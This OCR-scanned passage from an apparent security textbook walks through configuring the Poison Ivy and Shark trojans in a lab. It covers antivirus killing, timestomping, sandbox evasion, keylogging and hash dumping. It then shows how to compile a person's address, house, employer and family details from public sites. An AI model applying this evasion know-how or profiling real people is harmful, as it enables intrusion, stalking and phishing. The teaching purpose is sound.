‘There are six main tabs in Poison Ivy: Information, Managers, Tools, Surveillance, Plug-ins, and 


Administration. Many of these sections are fairly straightforward. 
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Information 


The Information tab gives you detailed characteristics about the server Poison Ivy is running on 
and characteristics about the server itself, such as its install path, key log path, injected informa- 
tion, and process Mutex. This is important for the hacker if he has generated multiple strains of 
malware and forgets the artifacts of it. 


admin [10.9.2.3] - Poison Ivy 


Microsoft Windows Server 2003 


3730 
6971 2-640-2301 2394-45062 


Logged on User Administrator 
Account Type Admin 
Computer Name VICTIM 
Workgroup BOOYA 
System Uptime 3h 58m 58s 


>. Installed Applications 
M Windows 


49 Active Ports 


Processor Intel(R) Core(TM)2 Duo CPU — P8800 @ 2.65: 
CPU 2653 MHz 
RAM 383.49 MB 
NT/NTLM Hashes = 
Server Settings: 
3?) Wireless ID admin 
*; Surveillance Group 

—3 Key Logger DNS/Port Direct; 10.9.2.3:443, 

349 Audio Capture Proxy DNS/Port 

@ Screen Capture Proxy Hijack — No : u- of 

A Webcam Capture xl 4 » 

Download: | 0B/s Upload: | 0 B/s y 
Management 


The Management tab allows you to fully manage the server and perform malicious operations and 
prevent detection. The Management tab has the following options: 


Files: Manipulate and search for files on the system. 
Regedit: Manage the registry. 

Processes: Identify running processes. 

Services: Identifiy running services. 

Devices: Identify running devices. 

Installed applications: Identify applications installed. 
Windows: See the current windows that are opened. 


Files 


The Files tab allows you to manipulate and search for files on the system. This tab will also allow 
you to look at the registry and modify it. This may be important for adding more malware and 
further infiltrating into the system. 


Processes 


The Processes tab will allow the hacker to get a list of running process, and if he sees a process 
such as an antivirus (e.g., Windows Defender or Norton32.exe), the hacker would likely kill this 


[D see us 
Ad A\ Removable) 
Ee C (Fixed, free: 4.74/7.99 GiB) 

1) Documents and Settings 
{3 Program Files 
123 System Volume Information 
© WINDOWS 
<2 wmpub 

2 DA (CDROM) 
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File Manager 
[Nam [Se [Tye Att 
j|. md 1KB RND A 
f]AUTOEXECBAT 0B BAT A 
boot ini 190B INI AH 
CONFIG.SYS 0B sys A 
10.5YS 0B SYS — AH 
Ij MSDOS.SYS 0B SYS AH 
É*INrbETECT.COM 4643KB COM AH 
Ej nildr 270.66 KiB AH 
pagefile.sys 576 MiB sys AH 
‘ E 


fea 


I [14 objects | 576.31 MB 


process to prevent his actions from being detected. 


Tools 


The Tools tab allows the hacker to perform more malicious actions by giving access to a remote 


E System Id... 0 
im System 4 00000000 
[T] smssexe —_\SystemRoot\System32\smss.exe 360 48580000 
[f] csssexe — CNWINDOWS \system32\csrss.exe 416 44680000 
E winlogon... NC NWINDO WS \system32\winlogon. exe 440 01000000 
[t services. C:\AWINDOWS \system32\services.exe 484 01000000 
RHE] Isass.ene — C:AWINDOWS\system32\lsass.exe 496 01000000 
E svchoste... CAWINDOWS\system32\svchost.exe 644 01000000 
[£5] svchoste... C:AWINDOWS\System32\svchost.exe 696 01000000 
HE svchoste... C:\WINDOWS\system32\svchost. exe 896 01000000 
[E] svchoste... C:\WINDOWS\system32\svchost exe 348 01000000 
EE] spoolsv.e... C:\WINDOWS\systern32\spoolsv.exe 1268 01000000 
C3 [7] msdicese  CAWINDOWS\system32\msdtc.exe 1300 00400000 
s NT/NTLM Hashes HE] dissvcexe C:AWINDOWS\system32\Dissve.exe 1372 01000000 
: cut, loi [J dns.exe  C:AWINDOWS\System324dns.exe 1408 — 01000000 
T EO Key Logger :B svchoste.. C:AWINDOWS\System32\svchost exe 1464 — 01000000 
39 Audio Capture [£7] ismserv.exe | CNWINDOWSNSystem32Niemserv.exe. 1488 01000000 
E Screen Capture HE ntisexe  C:AWINDOWS\system32\ntfrs.exe 1500 01000000 
& Webcam Capture E svchoste... CAWINDOWS\system32\svchost.exe 1572 01000000 
D> Plugins [: HA vmtoolsd... C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 1596 00400000 m 
sÀ an rx wen niminen a om ama moncere al 
r^ con =) Processes: 28 || CPU Usage 3.5% (Mem Usage: 92.41 MB (Threads; 355 (Handles: 7044 
Download: OB/s Upload: OB/s y, 


shell and cracking passwords. 'This tab has the following options: 


B Relay: Allows you to relay through other servers. 
B Active ports: Shows active ports. 
B Remote shell: Gives hacker administrative command prompt. 
m Password audit: Dumps password hashes. 
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Active Ports 


The Active Ports tab gives a list of the active ports on the system. This might be important to the 
hacker if he needs to figure out what this server is doing, or find other computers trying to connect 
to this server in order to try and hack other servers. 


iab. Regedit 


ja) Search 
= 
& Processes = LISTENING 
$ Services TP 000.0 ES id 5 LISTENING 
B Devices : TCP 0000 636 x " LISTENING 
3. Installed Applications TCP 0000 1025 = x LISTENING 
7] Windows TCP 0000 1028 = z LISTENING 
P Took TCP 0.0.0.0 1040 . . LISTENING 
3$ Relay TCP 0000 1048 x g LISTENING 
4 TCP 0.0.0.0 2733 . g LISTENING 
= Remote Shell TCP 0000 3268 . x LISTENING 
Wil Remote TCP 0000 3269 z z LISTENING 
P Password Audit TCP 10823 133 = g LISTENING 
(73 Cached TCP 10.9.2.3 389 10323 3238 ESTABLISHED 
^ NT/NTLM Hashes TCP 10323 443 10323 3272 ESTABLISHED 
2” Wireless TCP 10823 3238 10323 389 ESTABLISHED 
® Suvellance TCP 10323 3272 10323 443 ESTABLISHED 
L-89 Key Logger TCP 10323 3287 10323 1025 TIME, WAIT 
» Audi TCP 127.0.0.1 389 127.0.0.1 1034 ESTABLISHED 
td Audio Capture TCP 1270.01 389 127.0.0.1 1035 ESTABLISHED 
M. Screen Capture TCP 127001 383 127001 1036 ESTABLISHED 
a Webcam Capture TCP 1270.01 383 1270.01 2849 ESTABLISHED 
F Plugins TCP 127.0.0.1 1034 127.0.0.1 389 ESTABLISHED 
mi] Administration TCP 127.0.0.1 1035 1270.01 389 ESTABLISHED 
Edi ID TCP 1270.01 1036 127.0.0.1 389 ESTABLISHED 
19 Share TCP 1270.01 2849 1270.01 389 ESTABLISHED 
A UDP 0.0.0.0 445 x * : 
= Update 0000 500 * * 
EI 
5 Restart 0000 1030 x = 
3X Uninstall Anan x of 
- b 
Download: | OB/s Upload: | OB/s p. 


Password Audit 


The Password Audit tab will allow the sniffing of cached passwords and will dump the Windows 
hash file for cracking of the hashes of the system. This is useful for the hacker for enumerating user 
accounts. Lastly, the hacker also has the ability to reveal the SSID and even the WEP keys of the 
network if the machine is running wireless and has the plug-in installed. 


[3] Managers 


1] Files 
$ Search 
=æ Regedit ARD SBASSDST4OMEEAADSB ATES. SIDECFEODIGAE SGIBTSCSSD7E0. 
lapi Search kibtgt AAD38435B51404EEAAD3B435B51..  8227FB89A7E5142A7B9372A7330E... 
3 Processes SUPPORT, 3883.. AAD38435B51404EEAAD3B435B51.. 0437ABGDSBA406C065DD1E 2364... 
i) Services DEV.V-3$77a(??.. AAD3B435B51404EEAAD3B435B51... 18D7142A0F55E 3BF243744BA51B... 
Æ Devices 
-2 Installed Applications 
M) Windows 
^ Tools 
3$ Relay 
9 Active Ports 
a Remote Shell" 
? Password Audit 
(73 Cached 
Z NTANTLM Hashes 
4? Wireless 
® Surveillance 
5) Key Logger 
49 Audio Capture 
** Screen Capture 
4 Webcam Capture 
J Plugins 
ssi) Administration 
P Edit ID 
"P Share m 


A. | indata 


Download: OB/s Upload: 0 B/s 
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Surveillance 


The next tab is Surveillance; this tab allows the hacker to monitor the computer for valued infor- 
mation such as keylogging, audio capture, screen capture, and webcam capture. 


admin [10.9.2.3] - Poison Ivy 


2/5) x) 
Key Logger 


[33 Managers 

|=) Files 
^) Search 

ab) Regedit 
ab) Search 

{Œ} Processes 

TP Services 

JE) Devices 

+. Installed Applications 


[> Program Manager «] (2010/30/11 - 00:49) 
usemame admin F nter] 


[» admin [10.9.2.3] - Poison Ivy «] (2010/30/11 - 00:50) 
password 123456$3/E nter] 


£^ NTANTLM Hashes 
2) Wireless 
® Surveillance 


“@ Audio Capture 
Screen Capture 
a, Webcam Capture 
3$ Plugins 


Download: | 0 B/s Upload: | OB/s J 


Shark 


Shark (http://chasenet.org/) is another remote administration tool (RAT) that allows a hacker 
to command and control a PC. Shark has more advanced backdoor capabilities and even bet- 
ter antiforensic capabilities. Shark’s network communications are also encrypted using RC4 
encryption, it allows for compressed transfers and also allows you to keylog, screen capture, 
and command shell, and it even has antidebugging capability and much more. Like Poison Ivy, 
Shark relies on the hacker uploading Shark’s executable to a victim, therefore the hacker has 
to initially generate the malware within Shark for it to command and control back to the host 
running the Shark client. 


To Create a Server 


In Shark go to File > Create Server. There are a quite a few more options in Shark that need to 
be set. Once again the server.exe name, install directory, and password need to be set. However, 
Shark also allows you to change the connection interval, also known as the beaconing interval, 
which is stealthier for hiding connections and beacons. To thwart being easily detected the hacker 
would make a beacon interval of maybe days or weeks. Also, Shark allows beaconing to many dif- 
ferent DNS/IP addresses, which once again increases the hacker’s ability to command and control 
the server if one of his beacons becomes compromised. 
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Create New Server x 


510.9.2.3 80 Working! 


In the Create New Server menu click on Add to add the SIN-DNS-addresses; this designates 
what this server should beacon to for command and control. 


Startup 


The startup determines how Shark is going to start during boot or when the computer restarts. 
Shark will generate a random ActiveX key and will add a key to HKCU, startup. 


E: 
Se Basic Settings 
eae start Up 
P Install Events Iv. Enable ActiveX Startup 
(a) Alternative Install 
$ Bind Files Activex-Key: [(6897873-C638-COAF-A390-ABZF2800CASE) 
3 Blacklist 
9 Anti Debugging 
b 4 MT I. Reg-HKCU Startup (Recommended on Vista) 
‘ut 
Compile Name: [WindowsUpdate SS 


Binding 

Shark, like Poison Ivy, has the ability to drop executables onto the victim system, and place them 
wherever the hacker pleases. In this example, the hacker attached another command and control 
executable within the Shark executable. Using multiple methods of backdoors prevents the hacker 
from losing control of his victim if he is detected. The other options allow the attached executables 
to remain hidden when executed or only be extracted. 
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Create New Server E ad 


ee Basic Settings 
©) Start Up 
{P Install Events 
" Alternative Install 
y 
© Blacklist 
5 Stealth 

4j Anti Debugging 
6 Summary 
X Stub 


XC Compile 


|. .]malware.exe 


[Fiename | Destination | size — |startmode | Param | wait for termination? 


%owindirYo\malwar... |9,50KB Normal No 


(C Hidden Start 


File: [C:\Documents and Settings\Administrator\Desktop\malware. me 
Destination: [owindir\malware.exe 


(* Normal Start You can use Yemindir%, 9esysdir9e and Yetempair% in the 
destination path as variables, 


(C Extract Only [^ Wait for the file's termination? 


Load Settings Save Settings 


Blacklist 


The Blacklist option allows Shark to prevent the investigation of the machine and/or the server 
to prevent detection. Therefore, it has the capability to kill network-monitoring programs such 
as TCPdump or Wireshark and to kill antivirus programs. As you can see, it has different modes 
from killing silently to killing Shark itself. This is highly beneficial to the hacker to prevent detec- 


tion and monitoring of an attacker action. 


E] 
Si Basic Settings 
EE Start Up 
a Install Events ethereal Ask all connected clients what to do now Process 
m" Alternative Install (Qantivirservice Stop service silently Service 
J? Bind Files Q tcpview Panic Mode 3 (Cut connections while proc. running) Process 
9 o wireshark Panic Mode 2 (Remove Server) Process 
$ Stealth € ad-aware Panic Mode 1 (Close Server) Process 
Anti Debugging 
o Summary 
@® Stub 
J«, Compile Add new blacklist object: 
Type 
b Process C Service 
(* Kill process silently Processname (without extension!): ETE 
(^ Kill process and inform all connected clients Itcpview 
© Ask all connected clients what to do now 
(^ Panic Mode 1 (Close Server) 
(^ Panic Mode 2 (Remove Server) 
(^ Panic Mode 3 (Cut connections while proc. running) 


Load Settings Save Settings 


Cancel 


Stealth 


Stealth allows Shark to manipulate date and time stamps to the Windows installation time of the 
Operating System. This technique is refereed to as timestomping in Metasploit and changes file 
attributes to prevent detection. Additionally, it will run in the background of the server undetected 


by traditional means. 
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Create New Server x 


r Manipulation 


K may File-Creation Time of server (Sets the Creating Time to the Windows-Installation 
Time; 
Iv. Modify File-Attributes (Sets server as "hidden" and as a "system file") 


Melt Server 


r Server Type 
(C Visible Server - Good for local testing. 
(C Hidden Server - Server runs in the background. 
(* Aggressive Server - Server runs in the background and will force the Startup Entries every few secs 


[ Misc 
[^ Only open ports when ondine 
T Sleep until next reboot (Requires Startup!) 


r- Delayed Connections 
Days: [o Mins: fo Attention: Take note that also the 
connection-interval set in the basic 


[^ Enable Connection 
buds ME EC E nnne 


ET 


Antidebugging 


This is one of the most powerful features of Shark—when Shark detects that a debugger or sand- 
box is running while the server is being run, it will kill itself This is because many times in an 
investigation an investigator will find malware on a victim and then need to test it in a testing 
environment that is controlled, such as VMware or Norman Sandbox. In order to prevent detec- 
tion of the malware in Shark, it will look at specific variables and processes and if one of these 
programs are detected it immediately knows the investigator is trying to investigate the Shark 
server as malware. At this point, Shark will shutdown to prevent an investigator from looking at 
it. This will aid the attacker, as the investigator will be unable to monitor beacons to unknown IP 
addresses and ports and it will prevent the command and control server from being compromised. 


a 
"s Basic Settings 
WV. start Up. r Debugger Detection 
<P Install Events 
Wa) akernative Install I Terminate Server when Debugger is present 
$ Bind Files 
Blacklist r Sandbox Detection 
Stealth 
[V. Terminate Server when being started on "Norman Sandbox" 
9 Summary 
& Sub j VM-Ware Detection 
«X comple fV. Terminate Server when it's being started on "VMWare Workstation" 
IV. Show message when it's detected: 
is program cannot be run on a virtual machine. 
f- 
resine 


Compile 


Once all the options are set, click Compile to create the executable. You also have the ability to 
generate an .exe, .scr, .pif, .cmd, .bat, and .com file. 
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[Create New Server E] 
^ ' 
«JP Install Events 
I] Akernative Install 
I Bind Files 
Blacklist 
Stealth (checking your settings... O 
Arb Debuging ^ ERE 4 
Summary @Preparing Compiler 
d$ Stub @Preparing Stub... 'server.exe" has successfully been built, 
Compile Loading Stub. T e: 269,93 KB 
@ checking for win32-Fie... 
EP Converting Header 
ÉP Encrypting Header 
@ Writing Header to Stub (427 Byte)... 
ÉP Writing Pointer (43608)... 
(successfully Compiled! 
O o 


Compile Summary 


Servername: admin 

Server EXE name: explorer.exe 

Target directory: System directory 

Group name: My Group 

Server password: iiid 

Connection interval: 7 seconds 

Used stub: stub.shark 

ActiveX startup: Activated - Key: (DB897B73-C638-COAF-A390-AB2F2800CASE) 
HKCU startup: Activated - Name: Windows Update 
SIN Hosts: 10.9.2.3:80 (Working!) 

Blacklist 


Process: ethereal. Reaction: Ask all connected clients what to do now 
Service: AntiVirService. Reaction: Stop service silently 
Process: tcpview. Reaction: Panic Mode 3 (Cut connections while proc. running) 
Process: Wireshark. Reaction: Panic Mode 2 (Remove Server) 
Process: ad-aware. Reaction: Panic Mode 1 (Close Server) 
Bound files: malware.exe (Destination: Ywindir%\malware.exe) 


Attributes 
Start message: Disabled 
Execute file on start: Disabled 
Open web page on start: Disabled 
Server type: Aggressive server 
Server is terminated when a debugger is detected. 
Server is terminated when VMware Workstation is detected. 


Server is terminated when Norman Sandbox is detected. 
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Attributes 
Server gives out a message when VMware Workstation is detected, before it kills itself. 
Server uses alternative HKCU-RegRun startup on guest systems. 
Server uses alternative AppData-RegRun install directory on guest systems. 
Server file creation time will be modified. 


File attributes will be modified. 


Command and Control with Shark 


Once the hacker has placed the file to the victim, then the hacker can start commanding and 
controlling it once it beacons. Notice that Shark has the ability to do all of the same things that 
Poison Ivy is able to do with the addition a few nifty features, such as 


B CD-keys: Shark will steal CD-keys from the system. 
B Printer: Allows you to print on the connected printer. 


Just like Poison Ivy, in order to interact with victims, double click on the victim itself and it will 
bring up the screen shown in the screenshot. 


admin (Administrator & VICTIM) (10.9.2.3) - shark 2.4.0 Fwb+ ioj x} 
Server Suspend Options Show Transfer Queue 


388 Server Info 
{A Notes 
{gj Download Folder 
B Information 
J9 Installed Apps 
1, Passwords 
(7) CD-Keys. 
W Network Adapters 
Active Ports 


— Printer 
1995 Client2Client Chat 
£) Client2Server Chat 
B-E Manager 
Windows 
© Processes 
P Services 
[F] Registry Editor 
E-F File Manager 
Oy Search Files 
E1453 Surveillance 
ool) Screen Capture 
| Aj Webcam Capture 
In] Keylogger 
|. Audio Capture 
EE Net Tools 
[4M Web Downloader 
| Host Redirect 
| (ad Packet Sniffer 
|... Reverse Proxy 


E Plugins 


[Server accepted hello, ready! {CPU Load: 0% | Memory Load: 87% (333,25 MB/363,48 MB) {Ping: "ms 4 


Once again this shows the varying attributes of the affected host. Notice that within Shark you 
have the ability to grab information such as 


B Information 
— Installed apps: Checks for installed applications and allows uninstalling. 
— Passwords: Allows you to dump the password hashes. 
- CD-keys: Allows you to steal the CD-keys of software installed. 
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— Network adapters: Gives network adapter information. 

— Active ports: Gives a list of active ports, can kill processes, and even capture packets. 
B Tools 

- DOS shell: Gives full-fledged DOS shell. 

— Printer: Allows hacker to print output to victim's printer. 

— Client2Chat/Server: Allows chatting with victim machine. 
B Manager 

— Windows: Gives a list of process names, paths, and PIDs. 

— Processes: Gives a list of running processes and associated PIDs. 

— Services: Gives a list of running services. 

— Registry: Registry editor. 

— File manager: Allows advanced searching of files. 
B Surveillance 

— Screen capture: Allows for capture of the screen and remote desktop. 

— Webcam capture: Allows viewing of an attached webcam. 

— Keylogger: Allows the capturing of a keyboard. 

— Audio capture: Allows the capturing of attached microphone devices. 
B Net tools 

— Web downloader: Allows downloading additional programs via the web. 

— Host redirect: Allows redirecting request to another host. 

— Packet sniffer: Allows deep packet inspection of traffic on network. 

— Reverse proxy: Reverse proxy server. 


File Searching 


Shark has the ability to do complex file searching, which is helpful for targeting specific pieces of 
information as it allows you designate file extensions, and look for certain byte-size ranges. 


shark (Administrator @ VICTIM) (10.9.2.3) - sharK 2.4.0 Fwb+ 


Server Suspend Options Show Transfer Queue 


1^, Passwords 
L Dxeys Start Path: ype 
E Network Adapters fey 1. C:\Documents and Sett... JPG A 
99, Active Ports /N]FDZM4X3FPSCT... C:\Documents and Sett... JPG — 7,98KB A 
HA Tools Search Mask (Seperate with"); | (S)FGNUZLSFRUIU,,, C:\Documents and Sett.. JPG — 4,75KB A 
«t pos shell -Jpg;" mp? ÍN]FSOBMILPQPEW... C:\Documents and Sett... JPG — 640Byte A 
-= Printer ent Chat Possible Wildcards: ? (one sign) [S] FSVMAVEFLKK3A . C:\Documents and Sett... JPG 1,44 KB A 
o —— oa * (many signs) | ]FG08B4IFXSOUV... C:\Documents and Sett... JPG — 700Byte — A 
oR Cntzse (S)FDFUOI7G9BWx.,, C:\Documents and Sett... JPG —— 2,12KB A 
c d F Include Subfolders (S)FFeRBSQFFZ2CI... C:\Documents and Sett... JPG —— 1,45KB A 
S)FGSBISIGNEELW... C:\Documents and Sett... JPG 1,11 KB A 
Processes 2 
E] Services 7 Ignore o-8yte Hes IN)FIQWWKVFGRPG... C:\Documents and Sett... JPG 1,21 KB A 
[F] Registry Edtor [^ Minimum File-Size (Bytes): (S)FK6NS69G5704D.., C:\Documents and Sett... JPG  1,12KB A 
EHE File Manager 400 (S)FMIAPM7FEYQ1.., C:\Documents and Sett... JPG 679Byte A 
Q, Search Files (S)FovGoTPFEMMC... C:\Documents and Sett... JPG 1,65 KB A 
B-E Surveillance [^ Maximum File-Size (Bytes): (S)FPZSAMOFRIKN... C:\Documents and Sett... JPG — 8,09KB A 
P, Screen Capture 400 IN]FQSGRSGB4CY.. C:\Documents and Sett... JPG —— 1,65KB A 
Es Webcam Capture Presenaorcen «C:\Documents and Sett... JPG 4,58 KB A 
x1» Keylogger *^|FRSX8GPGBQJR... C:\Documents and Sett... JPG 849 Byte A 
© Audio Capture (S) FW6WOLYF3ER7,,. C:\Documents and Sett... JPG 1,00 KB A 
EHE Net Tools (S)FWEWOLYF3ER7,.. C:\Documents and Sett... JPG —— 580Bye A 
3 we une IN]FXEYZ9GGARZIF... C:\Documents and Sett... JPG — 917Bye A 
rect 
; C:\Documents and Sett... JPG 947 Byt A E 
hd Packet Sniffer ae ii 5 dj 
W Reverse Proxy 
E Plugins ‘Finished [140 Objects LSIMB — 


JPG Plugin uploaded, resending last command CPU Load: 0% [Memory Load: 91% (347,46 MB/383,48 MB) Ping: -1 ms 
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Printer 


Lastly, Shark gives you the ability to print to the victim's printer! 


shark (Administrator & VICTIM) (10.9.2.3) - shark 2.4.0 Fwb+ y =/5) xj 
Server Suspend Options Show Transfer Queue 


a| Font: [rahoma 
Size: [i2 
T Bold 
T Underlined 
© Network Adapters Do 
WV. Active Ports T Stricethrough 
EHE3 Tools 
WI DOS Shell Copies: |i 
c Printer 
-0 Client2Client Chat 
©) Client2Server Chat 
B-E Manager 
[7] windows 
E Processes 
B Services 
[F] Registry Editor 
© fij File Manager 
C, Search Files 
B- Surveillance 
BS Screen Capture 
&*j Webcam Capture 
$ Keylogger hd 
-È hudo capture P 
1-25 Net Tools zj|t——————————————————————— 
User has returned from being away CPU Load: 1% [Memory Load: 91% (346,21 MB/383,46 MB) Ping: -1 ms A 


Summary 


Poison Ivy and Shark are advanced attack tools that the hacker can use for further penetration of the 
network. Using these tools aids in commanding and controlling multiple hosts, and helps in deeper 
infiltration into the network. Remember, these rely on obtaining initial access into the network, so 
the hard part is getting the servers onto the victim to better create a presence in the network. 


Chapter 12 


Social Engineering 
with Web 2.0 


Introduction 


Social engineering is a technique that can be utilized to convince people to divulge information about 
themselves, their company, or their organization. By doing some research beforehand, a hacker can 
trick someone into revealing details they would not normally disclose. If a hacker calls a Texas-based 
television provider and tries to order the HBO premium channel for George Bush, the agent would be 
more likely to complete the order when Mr. Bush’s correct address and phone number were provided. 
During the 1980s Kevin Mitnick became famous for his social engineering skills. The successful social 
engineering attacks Mitnick launched in the 1980s required great skill. However, with the advent 
of tools like MySpace, Facebook, Twitter, and others, social engineering has become a lot easier for 
hackers to do. I will refer to this new era of social engineering as “social engineering with Web 2.0.” 

By using the website www.zabasearch.com, you can locate just about anyone’s address. This 
includes the street address, city, state, and zip code. You can also get their phone number in some 
cases. It will also list previous addresses and the addresses of the person’s relatives. So, with the use 
of a single website, Zabasearch, you can have a lot of information about a person. 


ZABASEARCH maps 


NIGHOUNG TVA RENNE Got the Dit Check for Email Address 
TéMROGERS AVE Record Created: Unknown 

UPPER DARBY, PA 190 (610) 44se@8@8 Confirm Current Phone & Address 
Background Check on Ni T V; 


Check messages for: 


m - VARSALONE 
ZABASEARCH Map For: - MBBROGERS AVE 


NiCad VAR Sanana - Lanm a masso 
ame ROGERS AVE K 


UPPER DARBY. PA 1998 


ZabaSearch Links 

Top 25 Searched Names 
IP & Curr ion 

Create a Public Record 


Free Search Menu 
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But the fun does not end there with Zabasearch. In some cases, you have an ability to zoom 
in on the map and see it at the street level. This can give a person detailed information about the 
house and its lot. Information about the lot might indicate if the person has a pool or a play- 
ground, or, as in the case of the house in the next figure, you may see the need for a new roof or 
lawn fertilizer. 


| Map. | Satellite | Hybrid | 


1G gee 
u 


32010 Googie- En 


You can also take the address and put it into Google. Google can map it for you and possibly 
even provide you with a street-level view of the person’s house. A street-level view of the house can 
provide you with even more information about the location where someone lives. 


Google maps  WWMROGERS AVE Upper Darby PA #8882 ~ Search Maps | Show search options 
Get Directions My Maps « 
rts 
9 (ROGABAT. am 
Directions e Save to.. morev 


“T ! c T 


E 
S \ 
Í è Phe, 25 A 


j Hi , Address: sy 


Vatt, z 
= d ig H «MM Rogers Ave 
Theses P Via. PA 0002 
c2 = 
| 1 > Street view 
w a Cawley’ ir 
Í Chester pu Seer, Directions Search nearby Savelo.. morev 


In this case, with the street view provided by Google, you can see that the house is 


White 

Has two buses in the front yard 

Has a large number of windows in the front of the house 

Has two trees covering most of the front of the house 

Has a sidewalk badly in need of repair 

Has a driveway on the right side of the yard with grass on it in need of repair 
Has some stone in the structure 
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= 
rasia 


lestaura 
n 


ya Food 
Market 


b 
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Another way to get more pictures and even more information about a property is to go to the web- 
site www.zillow.com and type in the street address. Zillow is a free website that gives you a detailed 
description of the property as well as an estimate of the property’s value. Details for the property often 
include the year it was built, square footage, and number of bedrooms and bathrooms. Don't you hate 
it when people air their dirty laundry on the Internet? (This house may lack a dryer.) 


p 

> 7; a CIL 
— Zillow.com Homes Mortgage Advice Directory Local Info More * 
jer. et 
ai 

4 Map Pennsylvania +: Upper Darby Township * 
o purs homa? Qui cre-anareva gage Marketplace a 


POORRogers Ave 
Upper Darby, PA MIN 


© Recently Sold: $55,000 
Zestimate®: $159,000 
Monthly payment: $297 ~- 


Bedrooms: 

Bathrooms: 2 
Saft: 1,850 
Lot size: € 0 
Property type: Single Family 
Year built: 1930 
Parking type: 


Cooling system: 

Heating system: 

Fireplace: 

Last sold: October 07 


tore facts 
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Another utility that Zillow offers is a view of the street that house in on as well as "zestimates" 
on the prices of the surrounding houses in the neighborhood. 


© Recently Sold: sam 
Zestimate: $159,000 (> 


Beds: 3 Saft: 1,850 
Baths: 2.0 Lot: 6,000 


Q views+ WSave 


Zillow also offers additional views of the house, including 


B Map 

B Bird’s eye 
— Road 
— Aerial 

E Street 


Maps and Views 


Street View | 


Bird's eye Labels 


Another part of social engineering involves finding out where people work. There are a variety 
of methods to try to find out where someone works, but one of the easiest ways is to check the 
LinkedIn website. LinkedIn not only provides items such as employer and employment history, it 
also can provide the names and titles of the person’s coworkers and associates. 
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Edit Profile View Profile 


Jesse Varsalone (w=) 
Computer Forensic Senior Professional at Champlain College 
Baltimore, Maryland Area ` Higher Education 


Current + Assistant Professor at Champlain College Č 


What you will often find on the LinkedIn website is an entire month by month employment 
history of the person in their profile. Most individuals using LinkedIn also list the colleges they 
attended as well as the degrees they earned. People also often list industry certifications. 


Summary 


CISSP, MCT, MCSE, A+, Net+, Security+, CEH, CCNA, CIW, MCDBA, Oracle 8i*9i DBA, 
CTT+, Linux+ 


Experience 
Assistant Professor 


Other social networking sites where you can get information about people include 


Facebook 
‘Twitter 
Formspring.me 
MySpace 

Bebo 
Friendster 

Hi5 

Yournight 


These social networking sites contain a wealth of information about people. The most popular of 
these sites is Facebook, with about 500 million users. Facebook has changed the way people com- 
municate and has enabled people to contact individuals they have not seen in years. 

While Facebook is a lot of fun to use, there are many dangers associated with it, including 


B Information leakage 
B Malicious links 


Even having your name alone listed on Facebook can leave you vulnerable to information leak- 
age. I have several relatives with liberal views whose children's last names are a combination of 
their father's and mother's last names. While that may suit the parents, their children may wind 
up being more vulnerable to identify theft because the mother's maiden name is often used as a 
security passphrase when a customer is contacting a credit card company or financial institution. 
Many women will list their maiden names so old friends can find them. 


Kim [Flanders|Varsalone 
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Concerns about privacy often cause Facebook to change the amount of personal information 
that is displayed. At one time, the default was for Facebook to list the date of birth of a person. 
Date of birth is still listed for many accounts but is often only visible to friends or friends of friends. 


Information 


Relationship Status: 
Married to 


Children: 


Birthday: 
October 22, 1970 


Current City: 
Baltimore, MD 


To change the Facebook settings so no one except you can see your birthday, 


1. Go to Account in the right-hand corner of the screen and select privacy settings. 

2. Click Customize Settings. 

3. Under Birthday, click the drop-down box. 

4. Select Customize. 

5. In the Customize Privacy settings, select Only Me in the These people drop-down box. 
6. Click Save Settings. 


Custom Privacy 


^ Make this visible to 


These people: [BE y] 


Only I can see this. 


3X* Hide this from 


These people: 


Save Setting 


It is important to take steps to protect as much of your personal information as you can. 
Sometimes people are misled to believe that by protecting some information they are safe. 


[B People who aren't friends with MP see only some of his profile information. If you know Sams 


personally, send him a message or add him as a friend. 


This individual has made some of his profile private. He or she has also taken the additional 
step of omitting the year from their birthday. People will only be able to see the month and day. 


Information 


Relationship Status: 
Married 


Children: 


Birthday: 
June 12 
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To change the Facebook settings so your birthday is not displayed, 


1. Click on Home in the right-hand corner of the screen. 
2. Click Edit my Profile under your name in the left-hand corner of the screen. 
3. Under Basic Information, under Birthday, select Don't show my birthday in my profile. 


Birthday: |Ju iv (13 [y]| 1990 ¥ | Don't show my birthday in my profile. | 
{Show my full birthday in my profile. | 
Show only month & day in my profile. 


Interested In: [ ] Women 


While it is admirable that this person took some precautions by removing the year from their 
birthday, it may still be possible to determine their date of birth by examining other information 
on their “private profile.” By looking at the date of college or high school graduation, it may still be 
possible to determine the year the person was born. Most people are 17 or 18 when they graduate 
from high school. College graduation also may be a clue to age but it is less reliable. 


High School Columbia High School '88 


Unfortunately, many people do not take any precautions to try to protect their personal infor- 
mation. Instead, they broadcast information all over Facebook, including 


Date of birth 

Occupation and work history 

Spouse's name 

Schools and the years they have attended them 
Children's names, ages, schools 

Likes and hobbies 

Interests, such as music 

Relationship status and sexual orientation 
Contact email, phone number, and street address 


Some people have no problem listing the names and ages of their kids as well as their street 
address. Generally, this is not something you want to disclose on the Internet. 


Information 


Relationship Status: 
Married to 

Lsurena 

Children: 

John 3 years 
Trinity 1 year 
Birthday: 

-A 12, 19% 
Current City: 

Baltimore, MD 
Hometown: 


1620 MiMMC.D, Baltimore, MD 
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Other people want to tell you about their relationship status. This can reveal a lot about a person. 


About Me 
Basic Info Sex: Female 
Birthday: April 30, 19 
Children: 
Relationship In an Open Relationship 
Status: 
Interested In: Men 


Some people reveal information that should never be disclosed under any circumstances. 


Likes and Interests 


Activities Not Answering My Phone [vicodin] Show all (3) 


When researching a person, go to Google and type their name and “facebook.com”. 


Go O gle jesse varsalone facebook.com Search 
About 24,700 results (0.10 seconds) Advanced search 

4) Everything Jesse Varsalone | Facebook 

@ Images Friends 


Jesse Varsalone is on Facebook. Join Facebook to connect with Jesse 

llli Videos Varsalone and others you may know. Facebook gives people the power to share 
and makes ... 

v) More www.facebook.com/varsalone - Cached 


If you have a Facebook account, you can search for people by any of the following methods: 


B Name 
B Email 
B School 
— Class year 
— Classmate name 
B Company 
— Coworker name 


To search use the following link: http://www.facebook.com/?sk=ff#!/srch. php?ref=ffffc. 


Q, Search for Friends on Facebook 


Search By Name or E-mail 


Person's Name or E-mail 


Classmate Search 


School Name: [Class Year: we. 


Person's Name: 
(optional) 


Search by Company 


Company: 


Person's Name: 
(optional) 
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This technique could be used by people to find information about people who work for a cer- 
tain agency or company. The same technique can be used by people in information assurance to 
determine if any of their employees are leaking company data or information. Searching for email 
addresses is a technique that could be used by spammers or individuals attempting to spear phish 
a particular organization. 

In summary, Facebook provides a wealth of information about people. This information can 
